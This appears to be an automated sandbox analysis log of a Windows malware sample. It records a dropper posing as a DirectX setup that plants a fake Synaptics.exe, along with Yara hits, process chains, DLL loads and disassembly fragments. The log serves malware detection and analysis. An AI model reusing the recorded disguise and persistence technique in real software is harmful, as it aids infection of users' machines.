                          Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX8506.tmp, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: file.exeReversingLabs: Detection: 92%
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                          Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                          Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 15608
                          Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 2952
                          Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 14432
                          Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 14456
                          Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 3252
                          Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 15520
                          Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 14552
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: twext.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: shacct.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: idstore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: samlib.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: twinapi.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wlidprov.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: provsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: starttiledata.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: acppage.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: msi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: aepic.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: twext.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: starttiledata.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: acppage.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: msi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: aepic.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: acgenral.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeSection loaded: advpack.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: acgenral.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: advpack.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: devrtl.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: spinf.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: drvstore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: spfileq.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: cabinet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: inseng.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: ieadvpack.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\WNaEF7n.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeWindow found: window name: SysTabControl32Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: I accept the agreement
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeAutomated click: Next >
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeWindow detected: Installing Microsoft(R) DirectX(R)Welcome to setup for DirectXThe DirectX setup wizard guides you through installation of DirectX Runtime Components. Please read the following license agreement. Press the PAGE DOWN key to see the rest of the agreement. You must accept the agreement to continue the setup.MICROSOFT SOFTWARE LICENSE TERMSMICROSOFT DIRECTX END USER RUNTIMEThese license terms are an agreement between Microsoft Corporation (or based on where you live one of its affiliates) and you. Please read them. They apply to the software named above which includes the media on which you received it if any. The terms also apply to any Microsoft* updates* supplements* Internet-based services and * support servicesfor this software unless other terms accompany those items. If so those terms apply.BY USING THE SOFTWARE YOU ACCEPT THESE TERMS. IF YOU DO NOT ACCEPT THEM DO NOT USE THE SOFTWARE.If you comply with these license terms you have the rights below.1. INSTALLATION AND USE RIGHTS. You may install and use any number of copies of the software on your devices.2. SCOPE OF LICENSE. The software is licensed not sold. This agreement only gives you some rights to use the software. Microsoft reserves all other rights. Unless applicable law gives you more rights despite this limitation you may use the software only as expressly permitted in this agreement. In doing so you must comply with any technical limitations in the software that only allow you to use it in certain ways. You may not* work around any technical limitations in the software;* reverse engineer decompile or disassemble the software except and only to the extent that applicable law expressly permits despite this limitation;* make more copies of the software than specified in this agreement or allowed by applicable law despite this limitation;* publish the software for others to copy;* rent lease or lend the software;* transfer the software or this agreement to any third party; or* use the software for commercial software hosting services.3. BACKUP COPY. You may make one backup copy of the software. You may use it only to reinstall the software.4. DOCUMENTATION. Any person that has valid access to your computer or internal network may copy and use the documentation for your internal reference purposes.5. EXPORT RESTRICTIONS. The software is subject to United States export laws and regulations. You must comply with all domestic and international export laws and regulations that apply to the software. These laws include restrictions on destinations end users and end use. For additional information see www.microsoft.com/exporting.6. SUPPORT SERVICES. Because this software is as is we may not provide support services for it.7. ENTIRE AGREEMENT. This agreement and the terms for supplements updates Internet-based services and support services that you use are the entire agreement for the software and support services.8. APPLICABLE LAW.a. United States. If you acquired the s
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                          Source: file.exeStatic file information: File size 1059840 > 1048576
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
                          Source: Binary string: wextract.pdb source: file.exe, ._cache_file.exe.0.dr
                          Source: Binary string: dsetup32.pdb source: SET8EBB.tmp.6.dr
                          Source: Binary string: dxwsetup.pdb source: ._cache_file.exe, 00000002.00000003.1274116896.000000000246A000.00000004.00000020.00020000.00000000.sdmp, dxwsetup.exe, 00000006.00000000.1278152234.00000000002C1000.00000020.00000001.01000000.00000007.sdmp
                          Source: Binary string: wextract.pdbU source: file.exe, ._cache_file.exe.0.dr
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_0100198B LocalFree,RegCreateKeyExA,wsprintfA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,GetModuleFileNameA,RegCloseKey,wsprintfA,lstrlenA,RegSetValueExA,RegCloseKey,LocalFree,2_2_0100198B
                          Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 4_2_040BC98E push eax; iretd 4_2_040BC9B9
                          Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 4_2_06A4CF20 pushad ; iretd 4_2_06A4CF21
                          Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 4_2_06A4C184 push eax; iretd 4_2_06A4C98D
                          Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 4_2_06A4C184 push esp; iretd 4_2_06A4C999
                          Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 4_2_06A4C98F push eax; iretd 4_2_06A4C9B9
                          Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 4_2_073CCF20 pushad ; iretd 4_2_073CCF21
                          Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 4_2_073CC98E push eax; iretd 4_2_073CC9B9
                          Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 4_2_073CC184 push eax; iretd 4_2_073CC98D
